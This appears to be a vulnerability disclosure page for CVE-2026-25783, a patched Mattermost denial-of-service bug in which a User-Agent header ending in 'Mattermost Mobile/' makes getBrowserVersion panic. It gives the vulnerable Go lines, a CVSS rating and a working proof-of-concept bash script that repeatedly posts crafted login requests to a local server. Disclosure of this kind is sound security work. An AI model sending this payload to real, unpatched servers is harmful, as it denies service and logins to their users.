winfunc
Back to Hacktivity

Status: Patched

This vulnerability has been verified as resolved and deployed.

Mattermost logo
MattermostMediumCVE-2026-257832026

DoS via unchecked User-Agent token in getBrowserVersion (CVE-2026-25783)

Summary

Parsing a malformed User-Agent header could cause the server to panic

getBrowserVersion in server/channels/app/user_agent.go slices the first token following Mattermost-specific identifiers (e.g., Mattermost Mobile/) without validating that a token exists. Because HTTP User-Agent headers are fully attacker-controlled, the substring can be empty or whitespace-only, causing strings.Fields(...)[0] to panic (runtime error: index out of range). Any unauthenticated request that reaches DoLogin (and other paths that collect browser metadata) crashes the handler before completion. Repeated requests with User-Agent: Mattermost Mobile/ trigger continuous panics, denying service, exhausting logs, and preventing legitimate logins.

CVSS Score

VectorN
ComplexityL
PrivilegesN
User InteractionN
ScopeU
ConfidentialityN
IntegrityN
AvailabilityH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Vulnerability Location

SourceLine 165
server/channels/app/login.go
DoLogin()
SinkLine 111
server/channels/app/user_agent.go
getBrowserVersion()

Sink-to-Source Analysis

1
server/channels/app/login.go:170

Login handler consumes the HTTP User-Agent header and invokes getBrowserVersion without validation.

GO
bversion := getBrowserVersion(ua, r.UserAgent())
2
server/channels/app/user_agent.go:114

getBrowserVersion assumes a token is present and panics when strings.Fields(afterVersion) is empty.

GO
return limitStringLength(strings.Fields(afterVersion)[0], maxUserAgentVersionLength)

Impact Analysis

Critical Impact

Remote attackers can repeatedly crash unauthenticated HTTP endpoints that parse User-Agent metadata, resulting in a persistent denial of service. Login attempts fail, session creation halts, and server logs fill with panic traces. Availability is significantly degraded without needing credentials or user interaction.

Attack Surface

Any unauthenticated HTTP endpoint that parses User-Agent metadata, including the login endpoint (/api/v4/users/login).

Preconditions

No authentication required. Exploit complexity is minimal — only a crafted User-Agent header is needed.

Proof of Concept

Environment Setup

Requirements: Ubuntu 22.04 (any Linux/macOS works).

Install dependencies:

BASH
sudo apt update
sudo apt install -y git golang curl jq

Clone and build:

BASH
git clone https://github.com/mattermost/mattermost.git
cd mattermost
make build-server
./bin/mattermost &
sleep 5

Target Configuration

Server listens on http://localhost:8065 with default configuration. No extra config needed.

Exploit Delivery

BASH
#!/usr/bin/env bash
set -euo pipefail
TARGET="http://localhost:8065"
MALICIOUS_UA="Mozilla/5.0 Mattermost Mobile/"

for i in {1..5}; do
  curl -ki \
    -H "User-Agent: ${MALICIOUS_UA}" \
    -X POST \
    -H "Content-Type: application/json" \
    -d '{"login_id":"[email protected]","password":"bad"}' \
    "$TARGET/api/v4/users/login" || true
  echo "Request $i triggered panic (see server logs)."
  sleep 1
done

Outcome

Attacks keep the server panicking and returning 500 responses. Login attempts fail and the login subsystem becomes unavailable while logs flood with panic traces.

Expected Response: Server returns HTTP 500 for each request. Server logs show panic: runtime error: index out of range emitted by getBrowserVersion.

View Patch PRVerify fix on GitHub